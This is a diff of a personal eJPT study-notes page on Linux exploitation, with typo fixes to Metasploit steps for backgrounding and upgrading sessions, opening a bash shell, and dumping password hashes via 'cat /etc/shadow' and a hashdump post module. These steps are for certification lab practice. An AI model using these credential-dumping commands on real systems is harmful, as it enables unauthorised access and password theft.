Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Linux/Linux Vulnerabilities.md

 	- use backdoor module
 	- `/bin/bash -i`  (to obtain bash session)
 	- id
-	- cntrl + Z to put this session in the background
+	- cntl + Z to put this session in the background
 		- `sessions`
-		`- sessions -u 1 (upgrade session 1 to meterpreter session)`
+		- sessions -u 1 (upgrade session 1 to meterpreter session)`
 		- session 2
 		- `sysinfo`
 		- `getuid`  (uid=0 -> root user )
 		- `cat /etc/shadow` (dump hashes)
-			- put this in the background

 Andere manier is met hashdump module
 - `post/linux.gather/hashdump` module
 - set session 2 (meterpreter session)
 - give you hashed passwords and save them in a txt for you